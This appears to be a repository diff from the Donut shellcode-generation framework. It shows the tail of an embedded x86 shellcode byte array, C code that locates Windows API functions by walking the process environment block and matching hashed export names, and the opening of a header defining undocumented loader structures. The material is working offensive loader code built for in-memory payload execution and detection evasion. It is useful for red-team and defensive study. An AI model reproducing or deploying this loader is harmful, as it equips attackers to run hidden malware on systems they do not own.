476 0x8b, 0x55, 0x34, 0x85, 0xc9, 0x79, 0x05, 0x0f, 0xb7, 0xc1, 0xeb, 0x05,
477 0x8d, 0x46, 0x02, 0x03, 0xc1, 0x50, 0x53, 0xff, 0xd2, 0x89, 0x07, 0x83,
478 0xc7, 0x04, 0x8b, 0x44, 0x24, 0x10, 0x83, 0xc0, 0x04, 0x89, 0x44, 0x24,
479 0x10, 0x8b, 0x08, 0x85, 0xc9, 0x75, 0xd5, 0x8b, 0x5c, 0x24, 0x14, 0x8b,
480 0x43, 0x20, 0x83, 0xc3, 0x14, 0x89, 0x5c, 0x24, 0x14, 0x85, 0xc0, 0x75,
481 0x9c, 0x8b, 0x7c, 0x24, 0x1c, 0x8b, 0x9f, 0xa0, 0x00, 0x00, 0x00, 0x8b,
482 0xc6, 0x2b, 0x47, 0x34, 0x03, 0xde, 0x33, 0xc9, 0x89, 0x44, 0x24, 0x1c,
483 0x39, 0x0b, 0x74, 0x64, 0x8d, 0x4b, 0x08, 0xeb, 0x49, 0x0f, 0xb7, 0x01,
484 0x8b, 0xd0, 0x25, 0x00, 0xf0, 0x00, 0x00, 0x89, 0x54, 0x24, 0x10, 0x66,
485 0x3b, 0x44, 0x24, 0x20, 0x75, 0x23, 0x8b, 0xc2, 0x25, 0xff, 0x0f, 0x00,
486 0x00, 0x89, 0x44, 0x24, 0x10, 0x03, 0x03, 0x8b, 0x0c, 0x30, 0x03, 0x4c,
487 0x24, 0x1c, 0x8b, 0x44, 0x24, 0x10, 0x03, 0x03, 0x89, 0x0c, 0x30, 0x8b,
488 0x4c, 0x24, 0x14, 0xeb, 0x0e, 0xb8, 0x00, 0x10, 0x00, 0x00, 0x66, 0x3b,
489 0xd0, 0x0f, 0x83, 0x25, 0x01, 0x00, 0x00, 0x83, 0xc1, 0x02, 0x8b, 0x43,
490 0x04, 0x03, 0xc3, 0x89, 0x4c, 0x24, 0x14, 0x3b, 0xc8, 0x75, 0xaa, 0x83,
491 0x39, 0x00, 0x8b, 0xd9, 0x75, 0x9e, 0x33, 0xc9, 0x8b, 0x5c, 0x24, 0x18,
492 0x83, 0x3b, 0x03, 0x0f, 0x85, 0xf8, 0x00, 0x00, 0x00, 0x8d, 0x93, 0x04,
493 0x06, 0x00, 0x00, 0x66, 0x39, 0x0a, 0x0f, 0x84, 0xd9, 0x00, 0x00, 0x00,
494 0x8b, 0x4f, 0x78, 0x85, 0xc9, 0x0f, 0x84, 0xe5, 0x00, 0x00, 0x00, 0x8b,
495 0x7c, 0x31, 0x18, 0x85, 0xff, 0x0f, 0x84, 0xd9, 0x00, 0x00, 0x00, 0x8b,
496 0x44, 0x31, 0x1c, 0x03, 0xc6, 0x89, 0x44, 0x24, 0x1c, 0x8b, 0x44, 0x31,
497 0x20, 0x8b, 0x4c, 0x31, 0x24, 0x03, 0xc6, 0x03, 0xce, 0x89, 0x4c, 0x24,
498 0x20, 0x8d, 0x04, 0xb8, 0x83, 0xc0, 0xfc, 0x89, 0x44, 0x24, 0x18, 0x8b,
499 0x00, 0x52, 0x03, 0xc6, 0x50, 0xe8, 0xd8, 0x03, 0x00, 0x00, 0x59, 0x59,
500 0x85, 0xc0, 0x74, 0x1c, 0x8b, 0x44, 0x24, 0x18, 0x83, 0xe8, 0x04, 0x89,
501 0x44, 0x24, 0x18, 0x83, 0xef, 0x01, 0x0f, 0x84, 0x90, 0x00, 0x00, 0x00,
502 0x8d, 0x93, 0x04, 0x06, 0x00, 0x00, 0xeb, 0xd3, 0x8b, 0x44, 0x24, 0x20,
503 0x8b, 0x4c, 0x24, 0x1c, 0x0f, 0xb7, 0x44, 0x78, 0xfe, 0x8b, 0x04, 0x81,
504 0x03, 0xc6, 0x89, 0x44, 0x24, 0x20, 0x74, 0x70, 0x6a, 0x40, 0xb8, 0x00,
505 0x30, 0x00, 0x00, 0x50, 0x68, 0xbc, 0x00, 0x00, 0x00, 0x33, 0xc0, 0x50,
506 0xff, 0x55, 0x3c, 0x8b, 0xf8, 0x85, 0xff, 0x74, 0x57, 0x68, 0xbc, 0x00,
507 0x00, 0x00, 0x8d, 0x44, 0x24, 0x34, 0x50, 0x57, 0xe8, 0xc8, 0x05, 0x00,
508 0x00, 0x8d, 0x83, 0x08, 0x08, 0x00, 0x00, 0x50, 0xff, 0xb3, 0x04, 0x08,
509 0x00, 0x00, 0xff, 0x74, 0x24, 0x34, 0xff, 0xd7, 0x68, 0xbc, 0x00, 0x00,
510 0x00, 0x33, 0xdb, 0x53, 0x57, 0xe8, 0xcb, 0x05, 0x00, 0x00, 0x83, 0xc4,
511 0x24, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x53, 0x57, 0xff, 0x55, 0x40, 0xeb,
512 0x17, 0x8b, 0x47, 0x28, 0x51, 0x6a, 0x01, 0xff, 0x74, 0x24, 0x34, 0x03,
513 0xc6, 0xff, 0xd0, 0xeb, 0x07, 0x8b, 0x47, 0x28, 0x03, 0xc6, 0xff, 0xd0,
514 0x68, 0x00, 0xc0, 0x00, 0x00, 0x33, 0xc0, 0x50, 0x56, 0xff, 0x55, 0x40,
515 0x5e, 0x5f, 0x5d, 0x5b, 0x81, 0xc4, 0xdc, 0x00, 0x00, 0x00, 0xc3, 0x81,
516 0xec, 0xd8, 0x00, 0x00, 0x00, 0x53, 0x8b, 0x9c, 0x24, 0xe0, 0x00, 0x00,
517 0x00, 0x55, 0x56, 0x57, 0x83, 0xbb, 0x0c, 0x05, 0x00, 0x00, 0x01, 0x8d,
518 0xb3, 0x48, 0x07, 0x00, 0x00, 0x74, 0x02, 0x8b, 0x36, 0x8b, 0x83, 0x40,
519 0x07, 0x00, 0x00, 0x33, 0xff, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00,
520 0x8d, 0x04, 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x57, 0xff, 0x53, 0x3c,
521 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0x3f, 0x01, 0x00, 0x00, 0x8b, 0x8e,
522 0x10, 0x19, 0x00, 0x00, 0x03, 0xc9, 0x51, 0x55, 0x6a, 0xff, 0x8d, 0x8e,
523 0x18, 0x19, 0x00, 0x00, 0x51, 0x57, 0x57, 0xff, 0x53, 0x50, 0x8d, 0x44,
524 0x24, 0x44, 0x89, 0x44, 0x24, 0x18, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x53,
525 0xe8, 0x4c, 0xea, 0xff, 0xff, 0x8d, 0x44, 0x24, 0x78, 0x89, 0x44, 0x24,
526 0x2c, 0x8d, 0x44, 0x24, 0x2c, 0x50, 0x53, 0xe8, 0xfe, 0xf2, 0xff, 0xff,
527 0x83, 0xc4, 0x10, 0x89, 0x7c, 0x24, 0x20, 0x57, 0x57, 0xff, 0x93, 0xa8,
528 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xc8, 0x00, 0x00, 0x00, 0x8d,
529 0x44, 0x24, 0x10, 0x50, 0x8d, 0x83, 0x9c, 0x04, 0x00, 0x00, 0x50, 0x6a,
530 0x03, 0x57, 0x8d, 0x83, 0x7c, 0x04, 0x00, 0x00, 0x50, 0xff, 0x93, 0xac,
531 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xa4, 0x00, 0x00, 0x00, 0x8b,
532 0x4c, 0x24, 0x10, 0x8d, 0x44, 0x24, 0x14, 0x50, 0x8d, 0x83, 0xbc, 0x04,
533 0x00, 0x00, 0x50, 0x8b, 0x11, 0x51, 0xff, 0x12, 0x85, 0xc0, 0x75, 0x77,
534 0x8b, 0x44, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x0c, 0x85, 0xc0,
535 0x75, 0x5f, 0x8b, 0x4c, 0x24, 0x10, 0x8d, 0x54, 0x24, 0x18, 0x89, 0x4c,
536 0x24, 0x30, 0x52, 0x51, 0x8b, 0x01, 0xff, 0x50, 0x0c, 0x85, 0xc0, 0x75,
537 0x48, 0x8d, 0x83, 0xcc, 0x03, 0x00, 0x00, 0x50, 0xff, 0x53, 0x70, 0x8b,
538 0x4c, 0x24, 0x10, 0x8b, 0xf8, 0x6a, 0x02, 0x57, 0x51, 0x8b, 0x11, 0xff,
539 0x52, 0x20, 0x57, 0x8b, 0xf0, 0xff, 0x53, 0x74, 0x33, 0xff, 0x85, 0xf6,
540 0x75, 0x23, 0x8b, 0x44, 0x24, 0x14, 0x57, 0x57, 0x57, 0x8b, 0x08, 0x57,
541 0x57, 0x57, 0x57, 0x57, 0x55, 0x50, 0xff, 0x51, 0x14, 0x85, 0xc0, 0x75,
542 0x0c, 0x8b, 0x44, 0x24, 0x10, 0x6a, 0x02, 0x50, 0x8b, 0x08, 0xff, 0x51,
543 0x14, 0x8b, 0x44, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0x8b,
544 0x44, 0x24, 0x10, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x1c, 0x8b, 0x44, 0x24,
545 0x10, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0x8b, 0x83, 0x40, 0x07, 0x00,
546 0x00, 0x8d, 0x04, 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x57, 0x55, 0xe8,
547 0x15, 0x04, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x68, 0x00, 0xc0, 0x00, 0x00,
548 0x57, 0x55, 0xff, 0x53, 0x40, 0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0xd8,
549 0x00, 0x00, 0x00, 0xc3, 0x83, 0xec, 0x0c, 0x53, 0x55, 0x56, 0x8b, 0x74,
550 0x24, 0x1c, 0x57, 0x83, 0xbe, 0x0c, 0x05, 0x00, 0x00, 0x01, 0x8d, 0xbe,
551 0x48, 0x07, 0x00, 0x00, 0x74, 0x02, 0x8b, 0x3f, 0x8b, 0x86, 0x40, 0x07,
552 0x00, 0x00, 0x33, 0xed, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0x8d,
553 0x04, 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x55, 0xff, 0x56, 0x3c, 0x8b,
554 0xd8, 0x85, 0xdb, 0x0f, 0x84, 0xd1, 0x00, 0x00, 0x00, 0x8b, 0x8f, 0x10,
555 0x19, 0x00, 0x00, 0x03, 0xc9, 0x51, 0x53, 0x6a, 0xff, 0x8d, 0x8f, 0x18,
556 0x19, 0x00, 0x00, 0x51, 0x55, 0x55, 0xff, 0x56, 0x50, 0x55, 0x55, 0xff,
557 0x96, 0xa8, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0x87, 0x00, 0x00,
558 0x00, 0x8d, 0x44, 0x24, 0x10, 0x50, 0x8d, 0x86, 0xec, 0x04, 0x00, 0x00,
559 0x50, 0x6a, 0x01, 0x55, 0x8d, 0x86, 0xdc, 0x04, 0x00, 0x00, 0x50, 0xff,
560 0x96, 0xac, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x61, 0x8b, 0x44, 0x24,
561 0x10, 0x8d, 0x54, 0x24, 0x20, 0x52, 0x53, 0x50, 0x8b, 0x08, 0xff, 0x91,
562 0x04, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x40, 0x66, 0x39, 0x6c, 0x24,
563 0x20, 0x74, 0x39, 0x8b, 0x4c, 0x24, 0x10, 0x8d, 0x44, 0x24, 0x14, 0x50,
564 0x8d, 0x86, 0xfc, 0x04, 0x00, 0x00, 0x50, 0x8b, 0x11, 0x51, 0xff, 0x12,
565 0x85, 0xc0, 0x75, 0x20, 0x8b, 0x44, 0x24, 0x10, 0x8d, 0x54, 0x24, 0x18,
566 0x52, 0xff, 0x74, 0x24, 0x18, 0x8b, 0x08, 0x50, 0xff, 0x91, 0x8c, 0x00,
567 0x00, 0x00, 0x8b, 0x44, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08,
568 0x8b, 0x44, 0x24, 0x10, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0xff, 0x96,
569 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x86, 0x40, 0x07, 0x00, 0x00, 0x8d, 0x04,
570 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x55, 0x53, 0xe8, 0xf8, 0x02, 0x00,
571 0x00, 0x83, 0xc4, 0x0c, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x55, 0x53, 0xff,
572 0x56, 0x40, 0x5f, 0x5e, 0x5d, 0x5b, 0x83, 0xc4, 0x0c, 0xc3, 0x8b, 0x44,
573 0x24, 0x0c, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0x33, 0xc0, 0xc2, 0x10,
574 0x00, 0x8b, 0x44, 0x24, 0x04, 0x2b, 0x44, 0x24, 0x08, 0xc3, 0x8b, 0x44,
575 0x24, 0x04, 0x99, 0xf7, 0x7c, 0x24, 0x08, 0xc3, 0xe8, 0x00, 0x00, 0x00,
576 0x00, 0x58, 0x83, 0xe8, 0x05, 0xc3, 0x55, 0x8b, 0xec, 0x64, 0xa1, 0x30,
577 0x00, 0x00, 0x00, 0x33, 0xc9, 0x56, 0x8b, 0x40, 0x0c, 0x8b, 0x70, 0x0c,
578 0xeb, 0x20, 0x85, 0xc9, 0x75, 0x23, 0xff, 0x75, 0x18, 0xff, 0x75, 0x14,
579 0xff, 0x75, 0x10, 0xff, 0x75, 0x0c, 0x50, 0xff, 0x75, 0x08, 0xe8, 0x8c,
580 0xed, 0xff, 0xff, 0x8b, 0x36, 0x83, 0xc4, 0x18, 0x8b, 0xc8, 0x8b, 0x46,
581 0x18, 0x85, 0xc0, 0x75, 0xd9, 0x8b, 0xc1, 0x5e, 0x5d, 0xc3, 0x8b, 0x44,
582 0x24, 0x08, 0x56, 0x8b, 0x74, 0x24, 0x08, 0x8a, 0x16, 0x84, 0xd2, 0x74,
583 0x14, 0x8a, 0xca, 0x2b, 0xf0, 0x8a, 0xd1, 0x3a, 0x08, 0x75, 0x0a, 0x40,
584 0x8a, 0x0c, 0x06, 0x8a, 0xd1, 0x84, 0xc9, 0x75, 0xf0, 0x0f, 0xb6, 0x08,
585 0x0f, 0xb6, 0xc2, 0x2b, 0xc1, 0x5e, 0xc3, 0x83, 0xec, 0x14, 0x53, 0x8b,
586 0x5c, 0x24, 0x20, 0x33, 0xc0, 0x55, 0x8b, 0x6c, 0x24, 0x28, 0x56, 0x57,
587 0x33, 0xff, 0x89, 0x44, 0x24, 0x2c, 0x33, 0xf6, 0x89, 0x74, 0x24, 0x10,
588 0x8b, 0x4c, 0x24, 0x28, 0x8a, 0x0c, 0x08, 0x84, 0xc9, 0x74, 0x11, 0x83,
589 0xf8, 0x40, 0x74, 0x0c, 0x88, 0x4c, 0x3c, 0x14, 0x47, 0x40, 0x89, 0x44,
590 0x24, 0x2c, 0xeb, 0x57, 0x6a, 0x10, 0x58, 0x2b, 0xc7, 0x8d, 0x74, 0x24,
591 0x14, 0x50, 0x03, 0xf7, 0x6a, 0x00, 0x56, 0xe8, 0xfd, 0x01, 0x00, 0x00,
592 0x83, 0xc4, 0x0c, 0xc6, 0x06, 0x80, 0x83, 0xff, 0x0c, 0x72, 0x21, 0x55,
593 0x8d, 0x44, 0x24, 0x18, 0x53, 0x50, 0xe8, 0x5e, 0x00, 0x00, 0x00, 0x6a,
594 0x10, 0x33, 0xd8, 0x33, 0xea, 0x8d, 0x44, 0x24, 0x24, 0x6a, 0x00, 0x50,
595 0xe8, 0xd4, 0x01, 0x00, 0x00, 0x83, 0xc4, 0x18, 0x8b, 0x44, 0x24, 0x2c,
596 0x8b, 0x74, 0x24, 0x10, 0xc1, 0xe0, 0x03, 0x46, 0x6a, 0x10, 0x89, 0x44,
597 0x24, 0x24, 0x5f, 0x89, 0x74, 0x24, 0x10, 0x83, 0xff, 0x10, 0x75, 0x15,
598 0x55, 0x8d, 0x44, 0x24, 0x18, 0x53, 0x50, 0xe8, 0x21, 0x00, 0x00, 0x00,
599 0x83, 0xc4, 0x0c, 0x33, 0xd8, 0x33, 0xea, 0x33, 0xff, 0x8b, 0x44, 0x24,
600 0x2c, 0x85, 0xf6, 0x0f, 0x84, 0x67, 0xff, 0xff, 0xff, 0x5f, 0x5e, 0x8b,
601 0xd5, 0x8b, 0xc3, 0x5d, 0x5b, 0x83, 0xc4, 0x14, 0xc3, 0x83, 0xec, 0x10,
602 0x8b, 0x44, 0x24, 0x18, 0x8b, 0x54, 0x24, 0x1c, 0x53, 0x55, 0x56, 0x8b,
603 0x74, 0x24, 0x20, 0x33, 0xdb, 0x57, 0x8d, 0x7c, 0x24, 0x10, 0xa5, 0xa5,
604 0xa5, 0xa5, 0x8b, 0x4c, 0x24, 0x14, 0x8b, 0x74, 0x24, 0x1c, 0x8b, 0x6c,
605 0x24, 0x18, 0x8b, 0x7c, 0x24, 0x10, 0x89, 0x4c, 0x24, 0x28, 0x8b, 0xce,
606 0xc1, 0xc8, 0x08, 0x8b, 0x74, 0x24, 0x28, 0x03, 0xc2, 0xc1, 0xce, 0x08,
607 0x33, 0xc7, 0x03, 0xf7, 0xc1, 0xc2, 0x03, 0x33, 0xf3, 0xc1, 0xc7, 0x03,
608 0x33, 0xd0, 0x89, 0x6c, 0x24, 0x28, 0x33, 0xfe, 0x8b, 0xe9, 0x43, 0x83,
609 0xfb, 0x1b, 0x72, 0xd6, 0x5f, 0x5e, 0x5d, 0x5b, 0x83, 0xc4, 0x10, 0xc3,
610 0x8b, 0x54, 0x24, 0x10, 0x83, 0xec, 0x14, 0x53, 0x8b, 0x5c, 0x24, 0x24,
611 0x85, 0xd2, 0x0f, 0x84, 0xe8, 0x00, 0x00, 0x00, 0x8b, 0x44, 0x24, 0x20,
612 0x55, 0x33, 0xed, 0x45, 0x56, 0x8d, 0x48, 0x0f, 0x2b, 0xe8, 0x57, 0x89,
613 0x4c, 0x24, 0x10, 0x89, 0x6c, 0x24, 0x34, 0x8b, 0xf0, 0x8d, 0x7c, 0x24,
614 0x14, 0x33, 0xc9, 0xa5, 0xa5, 0xa5, 0xa5, 0x8b, 0x74, 0x24, 0x28, 0x8b,
615 0x04, 0x8e, 0x31, 0x44, 0x8c, 0x14, 0x41, 0x83, 0xf9, 0x04, 0x72, 0xf3,
616 0x8b, 0x74, 0x24, 0x20, 0x8b, 0x44, 0x24, 0x1c, 0x8b, 0x7c, 0x24, 0x18,
617 0x8b, 0x4c, 0x24, 0x14, 0xc7, 0x44, 0x24, 0x30, 0x10, 0x00, 0x00, 0x00,
618 0x03, 0xcf, 0x03, 0xc6, 0xc1, 0xc7, 0x05, 0x33, 0xf9, 0xc1, 0xc6, 0x08,
619 0x33, 0xf0, 0xc1, 0xc1, 0x10, 0x03, 0xc7, 0x03, 0xce, 0xc1, 0xc7, 0x07,
620 0xc1, 0xc6, 0x0d, 0x33, 0xf8, 0x33, 0xf1, 0xc1, 0xc0, 0x10, 0x83, 0x6c,
621 0x24, 0x30, 0x01, 0x75, 0xd7, 0x8b, 0x6c, 0x24, 0x28, 0x89, 0x4c, 0x24,
622 0x14, 0x33, 0xc9, 0x89, 0x74, 0x24, 0x20, 0x89, 0x7c, 0x24, 0x18, 0x89,
623 0x44, 0x24, 0x1c, 0x8b, 0x44, 0x8d, 0x00, 0x31, 0x44, 0x8c, 0x14, 0x41,
624 0x83, 0xf9, 0x04, 0x72, 0xf2, 0x8b, 0x6c, 0x24, 0x34, 0x8b, 0xca, 0x6a,
625 0x10, 0x58, 0x3b, 0xd0, 0x0f, 0x47, 0xc8, 0x85, 0xc9, 0x7e, 0x19, 0x8d,
626 0x7c, 0x24, 0x14, 0x8b, 0xf3, 0x2b, 0xfb, 0x8b, 0xe9, 0x8a, 0x04, 0x37,
627 0x30, 0x06, 0x46, 0x83, 0xed, 0x01, 0x75, 0xf5, 0x8b, 0x6c, 0x24, 0x34,
628 0x2b, 0xd1, 0x03, 0xd9, 0x8b, 0x4c, 0x24, 0x10, 0x80, 0x01, 0x01, 0x75,
629 0x08, 0x49, 0x8d, 0x04, 0x29, 0x85, 0xc0, 0x7f, 0xf3, 0x8b, 0x44, 0x24,
630 0x2c, 0x85, 0xd2, 0x0f, 0x85, 0x32, 0xff, 0xff, 0xff, 0x5f, 0x5e, 0x5d,
631 0x5b, 0x83, 0xc4, 0x14, 0xc3, 0x8b, 0x54, 0x24, 0x0c, 0x8b, 0x44, 0x24,
632 0x04, 0x56, 0x8b, 0xf0, 0x85, 0xd2, 0x74, 0x13, 0x57, 0x8b, 0x7c, 0x24,
633 0x10, 0x2b, 0xf8, 0x8a, 0x0c, 0x37, 0x88, 0x0e, 0x46, 0x83, 0xea, 0x01,
634 0x75, 0xf5, 0x5f, 0x5e, 0xc3, 0x8a, 0x44, 0x24, 0x08, 0x8b, 0x4c, 0x24,
635 0x0c, 0x57, 0x8b, 0x7c, 0x24, 0x08, 0xf3, 0xaa, 0x8b, 0x44, 0x24, 0x08,
636 0x5f, 0xc3};
637
+149
-0
payload/peb.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // locate address of API in export table using Maru hash function
32 LPVOID FindExport(PDONUT_INSTANCE inst, LPVOID base, ULONG64 api_hash, ULONG64 iv){
33 PIMAGE_DOS_HEADER dos;
34 PIMAGE_NT_HEADERS nt;
35 DWORD i, j, cnt, rva;
36 PIMAGE_DATA_DIRECTORY dir;
37 PIMAGE_EXPORT_DIRECTORY exp;
38 PDWORD adr;
39 PDWORD sym;
40 PWORD ord;
41 PCHAR api, dll, p;
42 LPVOID addr=NULL;
43 ULONG64 dll_hash;
44 CHAR buf[MAX_PATH], dll_name[64], api_name[128];
45
46 dos = (PIMAGE_DOS_HEADER)base;
47 nt = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
48 dir = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
49 rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
50
51 // if no export table, return NULL
52 if (rva==0) return NULL;
53
54 exp = RVA2VA(PIMAGE_EXPORT_DIRECTORY, base, rva);
55 cnt = exp->NumberOfNames;
56
57 // if no api names, return NULL
58 if (cnt==0) return NULL;
59
60 adr = RVA2VA(PDWORD,base, exp->AddressOfFunctions);
61 sym = RVA2VA(PDWORD,base, exp->AddressOfNames);
62 ord = RVA2VA(PWORD, base, exp->AddressOfNameOrdinals);
63 dll = RVA2VA(PCHAR, base, exp->Name);
64
65 // get hash of DLL string converted to lowercase
66 for(i=0;dll[i]!=0;i++) {
67 buf[i] = dll[i] | 0x20;
68 }
69 buf[i] = 0;
70 dll_hash = maru(buf, iv);
71
72 do {
73 // calculate hash of api string
74 api = RVA2VA(PCHAR, base, sym[cnt-1]);
75 // xor with DLL hash and compare with hash to find
76 if ((maru(api, iv) ^ dll_hash) == api_hash) {
77 // return address of function
78 addr = RVA2VA(LPVOID, base, adr[ord[cnt-1]]);
79
80 // is this a forward reference?
81 if ((PBYTE)addr >= (PBYTE)exp &&
82 (PBYTE)addr < (PBYTE)exp +
83 dir[IMAGE_DIRECTORY_ENTRY_EXPORT].Size)
84 {
85 DPRINT("%016llx is forwarded to %s",
86 api_hash, (char*)addr);
87
88 // copy DLL name to buffer
89 p=(char*)addr;
90
91 for(i=0; p[i] != 0 && i < sizeof(dll_name)-4; i++) {
92 dll_name[i] = p[i];
93 if(p[i] == '.') break;
94 }
95
96 dll_name[i+1] = 'd';
97 dll_name[i+2] = 'l';
98 dll_name[i+3] = 'l';
99 dll_name[i+4] = 0;
100
101 p += i + 1;
102
103 // copy API name to buffer
104 for(i=0; p[i] != 0 && i < sizeof(api_name)-1;i++) {
105 api_name[i] = p[i];
106 }
107 api_name[i] = 0;
108
109 DPRINT("Trying to load %s", dll_name);
110 HMODULE hModule = inst->api.LoadLibrary(dll_name);
111
112 if(hModule != NULL) {
113 DPRINT("Calling GetProcAddress(%s)", api_name);
114 addr = inst->api.GetProcAddress(hModule, api_name);
115 } else addr = NULL;
116 }
117 return addr;
118 }
119 } while (--cnt && addr == NULL);
120
121 return addr;
122 }
123
124 // search all modules in the PEB for API
125 LPVOID xGetProcAddress(PDONUT_INSTANCE inst, ULONG64 ulHash, ULONG64 ulIV) {
126 PPEB peb;
127 PPEB_LDR_DATA ldr;
128 PLDR_DATA_TABLE_ENTRY dte;
129 LPVOID addr = NULL;
130
131 #if defined(_WIN64)
132 peb = (PPEB) __readgsqword(0x60);
133 #else
134 peb = (PPEB) __readfsdword(0x30);
135 #endif
136
137 ldr = (PPEB_LDR_DATA)peb->Ldr;
138
139 // for each DLL loaded
140 for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
141 dte->DllBase != NULL && addr == NULL;
142 dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
143 {
144 // search the export table for api
145 addr = FindExport(inst, dte->DllBase, ulHash, ulIV);
146 }
147 return addr;
148 }
+360
-0
payload/peb.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef PEB_H
32 #define PEB_H
33
34 #include <windows.h>
35
36 typedef void *PPS_POST_PROCESS_INIT_ROUTINE;
37
38 typedef struct _LSA_UNICODE_STRING {
39 USHORT Length;
40 USHORT MaximumLength;
41 PWSTR Buffer;
42 } LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING;
43
44 typedef struct _RTL_USER_PROCESS_PARAMETERS {
45 BYTE Reserved1[16];
46 PVOID Reserved2[10];
47 UNICODE_STRING ImagePathName;
48 UNICODE_STRING CommandLine;
49 } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
50
51 // PEB defined by rewolf
52 // http://blog.rewolf.pl/blog/?p=573
53 typedef struct _PEB_LDR_DATA {
54 ULONG Length;
55 BOOL Initialized;
56 LPVOID SsHandle;
57 LIST_ENTRY InLoadOrderModuleList;
58 LIST_ENTRY InMemoryOrderModuleList;
59 LIST_ENTRY InInitializationOrderModuleList;
60 } PEB_LDR_DATA, *PPEB_LDR_DATA;
61
62 typedef struct _LDR_DATA_TABLE_ENTRY
63 {
64 LIST_ENTRY InLoadOrderLinks;
65 LIST_ENTRY InMemoryOrderLinks;
66 LIST_ENTRY InInitializationOrderLinks;
67 LPVOID DllBase;
68 LPVOID EntryPoint;
69 ULONG SizeOfImage;
70 UNICODE_STRING FullDllName;
71 UNICODE_STRING BaseDllName;
72 } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
73
